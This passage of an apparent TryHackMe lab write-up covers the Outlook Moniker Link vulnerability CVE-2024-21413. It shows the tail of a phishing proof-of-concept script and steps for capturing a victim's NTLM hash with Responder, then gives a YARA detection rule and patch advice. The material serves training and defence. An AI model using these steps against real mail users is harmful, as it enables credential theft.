class=\"line\"><span style=\"color: #F8F8F2\">    <\/span><span style=\"color: #66D9EF\">print<\/span><span style=\"color: #F8F8F2\">(<\/span><span style=\"color: #E6DB74\">&quot;<\/span><span style=\"color: #AE81FF\">\\n<\/span><span style=\"color: #E6DB74\"> Email delivered&quot;<\/span><span style=\"color: #F8F8F2\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F92672\">except<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #66D9EF; font-style: italic\">Exception<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F92672\">as<\/span><span style=\"color: #F8F8F2\"> error:<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">    <\/span><span style=\"color: #66D9EF\">print<\/span><span style=\"color: #F8F8F2\">(error)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F92672\">finally<\/span><span style=\"color: #F8F8F2\">:<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">    server.quit()<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:28px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>This PoC:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Takes an attacker &amp; victim email. Normally, you would need to use your own SMTP server (this has already been provided for you in this room)<\/li>\n\n\n\n<li>Requires the password to authenticate. For this room, the password for <strong>attacker@monikerlink.thm<\/strong> is an <strong>attacker<\/strong><\/li>\n\n\n\n<li>Contains the email content (html_content), which contains our Moniker Link as an HTML hyperlink<\/li>\n\n\n\n<li>Then, fill in the &#8220;subject&#8221;, &#8220;from&#8221; and &#8220;to&#8221; fields in the email<\/li>\n\n\n\n<li>Finally, it sends the email to the mail server<\/li>\n<\/ul>\n\n\n\n<p>Let\u2019s use Responder to create an SMB listener on our attacking machine.<\/p>\n\n\n\n<div style=\"height:21px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03af901cb1a&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03af901cb1a\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"790\" data-attachment-id=\"588\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/03\/03\/moniker-link-cve-2024-21413\/image-2-3\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/03\/image-2.png?fit=1100%2C849&amp;ssl=1\" data-orig-size=\"1100,849\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image-2\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/03\/image-2.png?fit=1024%2C790&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/03\/image-2.png?resize=1024%2C790&#038;ssl=1\" alt=\"\" class=\"wp-image-588\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/03\/image-2.png?resize=1024%2C790&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/03\/image-2.png?resize=300%2C232&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/03\/image-2.png?resize=768%2C593&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/03\/image-2.png?w=1100&amp;ssl=1 1100w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:27px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>We will need to do some initial setup on Our Attack Machine before running the Python script:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Modify the Moniker Link (line #12) in our PoC to reflect the IP address of our Attack Machine<\/li>\n\n\n\n<li>Replace the MAILSERVER placeholder on line #31 with 10.10.40.219<\/li>\n<\/ul>\n\n\n\n<p>After we run our exploit, an email will be sent to our victim.<\/p>\n\n\n\n<div style=\"height:19px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03af901d4e3&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03af901d4e3\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"260\" data-attachment-id=\"589\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/03\/03\/moniker-link-cve-2024-21413\/image-3-3\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/03\/image-3.png?fit=1834%2C466&amp;ssl=1\" data-orig-size=\"1834,466\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image-3\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/03\/image-3.png?fit=1024%2C260&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/03\/image-3.png?resize=1024%2C260&#038;ssl=1\" alt=\"\" class=\"wp-image-589\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/03\/image-3.png?resize=1024%2C260&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/03\/image-3.png?resize=300%2C76&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/03\/image-3.png?resize=768%2C195&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/03\/image-3.png?resize=1536%2C390&amp;ssl=1 1536w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/03\/image-3.png?w=1834&amp;ssl=1 1834w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:28px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>If we click on the link, we get the NTLM hash of the user <\/p>\n\n\n\n<div style=\"height:20px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03af901db47&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03af901db47\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"229\" data-attachment-id=\"590\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/03\/03\/moniker-link-cve-2024-21413\/image-4-3\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/03\/image-4.png?fit=1236%2C277&amp;ssl=1\" data-orig-size=\"1236,277\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image-4\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/03\/image-4.png?fit=1024%2C229&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/03\/image-4.png?resize=1024%2C229&#038;ssl=1\" alt=\"\" class=\"wp-image-590\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/03\/image-4.png?resize=1024%2C229&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/03\/image-4.png?resize=300%2C67&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/03\/image-4.png?resize=768%2C172&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/03\/image-4.png?w=1236&amp;ssl=1 1236w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:19px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"2-detection-\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">Detection<\/mark><\/h2>\n\n\n\n<div style=\"height:11px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"3-yara-\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">YARA<\/mark><\/h3>\n\n\n\n<p>A <a href=\"https:\/\/github.com\/Neo23x0\/signature-base\/blob\/master\/yara\/expl_outlook_cve_2024_21413.yar\" target=\"_blank\" rel=\"noreferrer noopener\">Yara rule<\/a> has been created by <a href=\"https:\/\/twitter.com\/cyb3rops\/status\/1758792873254744344\" target=\"_blank\" rel=\"noreferrer noopener\">Florian Roth<\/a> to detect emails containing the <code>file:\\\\<\/code> element in the Moniker Link.<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#191724\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"rule EXPL_CVE_2024_21413_Microsoft_Outlook_RCE_Feb24 {\n\n   meta:\n\n      description = &quot;Detects emails that contain signs of a method to exploit CVE-2024-21413 in Microsoft Outlook&quot;\n\n      author = &quot;X__Junior, Florian Roth&quot;\n\n      reference = &quot;https:\/\/github.com\/xaitax\/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability\/&quot;\n\n      date = &quot;2024-02-17&quot;\n\n      modified = &quot;2024-02-19&quot;\n\n      score = 75\n\n   strings:\n\n      $a1 = &quot;Subject: &quot;\n\n      $a2 = &quot;Received: &quot;\n\n\n\n      $xr1 = \/file:\\\/\\\/\\\/\\\\\\\\[^&quot;']{6,600}\\.(docx|txt|pdf|xlsx|pptx|odt|etc|jpg|png|gif|bmp|tiff|svg|mp4|avi|mov|wmv|flv|mkv|mp3|wav|aac|flac|ogg|wma|exe|msi|bat|cmd|ps1|zip|rar|7z|targz|iso|dll|sys|ini|cfg|reg|html|css|java|py|c|cpp|db|sql|mdb|accdb|sqlite|eml|pst|ost|mbox|htm|php|asp|jsp|xml|ttf|otf|woff|woff2|rtf|chm|hta|js|lnk|vbe|vbs|wsf|xls|xlsm|xltm|xlt|doc|docm|dot|dotm)!\/\n\n   condition:\n\n      filesize &lt; 1000KB\n\n      and all of ($a*)\n\n      and 1 of ($xr*)\n\n}\" style=\"color:#e0def4;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki rose-pine\" style=\"background-color: #191724\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #E0DEF4\">rule <\/span><span style=\"color: #31748F\">EXPL_CVE_2024_21413_Microsoft_Outlook_RCE_Feb24<\/span><span style=\"color: #E0DEF4\"> <\/span><span style=\"color: #908CAA\">{<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #E0DEF4\">   meta<\/span><span style=\"color: #908CAA\">:<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #E0DEF4\">      description = <\/span><span style=\"color: #F6C177\">&quot;Detects emails that contain signs of a method to exploit CVE-2024-21413 in Microsoft Outlook&quot;<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #E0DEF4\">      author = <\/span><span style=\"color: #F6C177\">&quot;X__Junior, Florian Roth&quot;<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #E0DEF4\">      reference = <\/span><span style=\"color: #F6C177\">&quot;https:\/\/github.com\/xaitax\/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability\/&quot;<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #E0DEF4\">      date = <\/span><span style=\"color: #F6C177\">&quot;2024-02-17&quot;<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #E0DEF4\">      modified = <\/span><span style=\"color: #F6C177\">&quot;2024-02-19&quot;<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #E0DEF4\">      score = <\/span><span style=\"color: #EBBCBA\">75<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #E0DEF4\">   strings<\/span><span style=\"color: #908CAA\">:<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #E0DEF4\">      <\/span><span style=\"color: #EB6F92\">$<\/span><span style=\"color: #E0DEF4\">a1 = <\/span><span style=\"color: #F6C177\">&quot;Subject: &quot;<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #E0DEF4\">      <\/span><span style=\"color: #EB6F92\">$<\/span><span style=\"color: #E0DEF4\">a2 = <\/span><span style=\"color: #F6C177\">&quot;Received: &quot;<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #E0DEF4\">      <\/span><span style=\"color: #EB6F92\">$<\/span><span style=\"color: #E0DEF4\">xr1 = <\/span><span style=\"color: #31748F\">\/<\/span><span style=\"color: #EBBCBA; font-style: italic\">file<\/span><span style=\"color: #908CAA\">:\\<\/span><span style=\"color: #EB6F92\">\/\\\/\\\/\\\\\\\\[^&quot;&#39;]{6,600}\\.(docx|txt|pdf|xlsx|pptx|odt|etc|jpg|png|gif|bmp|tiff|svg|mp4|avi|mov|wmv|flv|mkv|mp3|wav|aac|flac|ogg|wma|exe|msi|bat|cmd|ps1|zip|rar|7z|targz|iso|dll|sys|ini|cfg|reg|html|css|java|py|c|cpp|db|sql|mdb|accdb|sqlite|eml|pst|ost|mbox|htm|php|asp|jsp|xml|ttf|otf|woff|woff2|rtf|chm|hta|js|lnk|vbe|vbs|wsf|xls|xlsm|xltm|xlt|doc|docm|dot|dotm)!\/<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #E0DEF4\">   condition<\/span><span style=\"color: #908CAA\">:<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #E0DEF4\">      filesize <\/span><span style=\"color: #31748F\">&lt;<\/span><span style=\"color: #E0DEF4\"> <\/span><span style=\"color: #EB6F92\">1000KB<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #E0DEF4\">      <\/span><span style=\"color: #31748F\">and<\/span><span style=\"color: #E0DEF4\"> <\/span><span style=\"color: #EB6F92; font-style: italic\">all<\/span><span style=\"color: #E0DEF4\"> of <\/span><span style=\"color: #908CAA\">(<\/span><span style=\"color: #EB6F92\">$<\/span><span style=\"color: #E0DEF4\">a<\/span><span style=\"color: #31748F\">*<\/span><span style=\"color: #908CAA\">)<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #E0DEF4\">      <\/span><span style=\"color: #31748F\">and<\/span><span style=\"color: #E0DEF4\"> <\/span><span style=\"color: #EBBCBA\">1<\/span><span style=\"color: #E0DEF4\"> of <\/span><span style=\"color: #908CAA\">(<\/span><span style=\"color: #EB6F92\">$<\/span><span style=\"color: #E0DEF4\">xr<\/span><span style=\"color: #31748F\">*<\/span><span style=\"color: #908CAA\">)<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #908CAA\">}<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:27px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"4-remediation-\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">Remediation<\/mark><\/h2>\n\n\n\n<div style=\"height:17px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>Microsoft has included patches to resolve this vulnerability in February\u2019s \u201cpatch Tuesday\u201d release. You can see a list of KB articles by Office build <a href=\"https:\/\/msrc.microsoft.com\/update-guide\/en-US\/vulnerability\/CVE-2024-21413\" target=\"_blank\" rel=\"noreferrer noopener\">here<\/a>. Updating Office through Windows Update or the <a href=\"https:\/\/www.catalog.update.microsoft.com\/Home.aspx\" target=\"_blank\" rel=\"noreferrer noopener\">Microsoft Update Catalog<\/a> is strongly recommended.<\/p>\n\n\n\n<p>Additionally, in the meantime, it is a timely reminder to practice general &#8211; safe &#8211; cyber security practices. For example, reminding users to:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Do not click random links (especially from unsolicited emails)<\/li>\n\n\n\n<li>Preview links before clicking them<\/li>\n\n\n\n<li>Forward suspicious emails to the respective department responsible for cyber security<\/li>\n<\/ul>\n\n\n\n<p>Since this vulnerability bypasses Outlook&#8217;s Protected View, there is no way to reconfigure Outlook to prevent this attack. Additionally, preventing the SMB protocol entirely may do more harm than good, especially as it is essential for accessing network shares. However, you may be able to block this at the firewall level, depending on the organization.<\/p>\n\n\n\n<div style=\"height:24px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n","protected":false},"excerpt":{"rendered":"<p>On February 13th, 2024, Microsoft announced a Microsoft Outlook RCE &amp; credential leak vulnerability with the assigned CVE of CVE-2024-21413 (Moniker Link). Haifei Li of Check Point Research is credited with discovering the vulnerability. The vulnerability bypasses Outlook&#8217;s security mechanisms when handing a specific type of hyperlink known as a Moniker Link. An attacker can [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"om_disable_all_campaigns":false,"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"_uf_show_specific_survey":0,"_uf_disable_surveys":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[1,49,11,39,12],"tags":[],"class_list":["post-584","post","type-post","status-publish","format-standard","hentry","category-blog","category-ctf","category-ctf-write-ups","category-cve","category-tryhackme"],"aioseo_notices":[],"featured_image_src":null,"author_info":{"display_name":"ishsome","author_link":"https:\/\/blog.ishsome.com\/index.php\/author\/e5c77740144cd4a8\/"},"jetpack_featured_media_url":"","jetpack-related-posts":[{"id":414,"url":"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/01\/gitlab-cve-2023-7028\/","url_meta":{"origin":584,"position":0},"title":"GitLab CVE-2023-7028","author":"ishsome","date":"February 1, 2024","format":false,"excerpt":"This blog is based on TryHackMe's room on GitLab CVE-2023-7028. Learning Objectives Exploit a GitLab CE instance through CVE 2023-7028 How the exploit works Protection and mitigation measures What is GitLab? GitLab is a renowned and widely adopted web-based repository manager that provides a comprehensive platform for source code management,\u2026","rel":"","context":"In &quot;Blog&quot;","block_context":{"text":"Blog","link":"https:\/\/blog.ishsome.com\/index.php\/category\/blog\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-1.png?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-1.png?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-1.png?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-1.png?resize=700%2C400&ssl=1 2x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-1.png?resize=1050%2C600&ssl=1 3x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-1.png?resize=1400%2C800&ssl=1 4x"},"classes":[]},{"id":625,"url":"https:\/\/blog.ishsome.com\/index.php\/2024\/05\/09\/cve-2023-33831\/","url_meta":{"origin":584,"position":1},"title":"CVE-2023-33831","author":"ishsome","date":"May 9, 2024","format":false,"excerpt":"This vulnerability allowed remote command execution (RCE) vulnerability in the \/api\/runscript endpoint of FUXA 1.1.13 allows attackers to execute arbitrary commands via a crafted POST request. This is due to lack of control or sanitization on inputs that can be controlled by users, thus allowing the use of dangerous methods\u2026","rel":"","context":"In &quot;Blog&quot;","block_context":{"text":"Blog","link":"https:\/\/blog.ishsome.com\/index.php\/category\/blog\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/05\/image.png?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/05\/image.png?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/05\/image.png?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/05\/image.png?resize=700%2C400&ssl=1 2x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/05\/image.png?resize=1050%2C600&ssl=1 3x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/05\/image.png?resize=1400%2C800&ssl=1 4x"},"classes":[]},{"id":306,"url":"https:\/\/blog.ishsome.com\/index.php\/2024\/01\/27\/http-request-smuggling\/","url_meta":{"origin":584,"position":2},"title":"HTTP Request Smuggling","author":"ishsome","date":"January 27, 2024","format":false,"excerpt":"This blog is based on the HHTP Request Smuggling room from TryHackMe. What is HTTP Request Smuggling? HTTP Request Smuggling is a vulnerability that arises when there are mismatches in different web infrastructure components. This includes proxies, load balancers, and servers that interpret the boundaries of HTTP requests. Request splitting\u2026","rel":"","context":"In 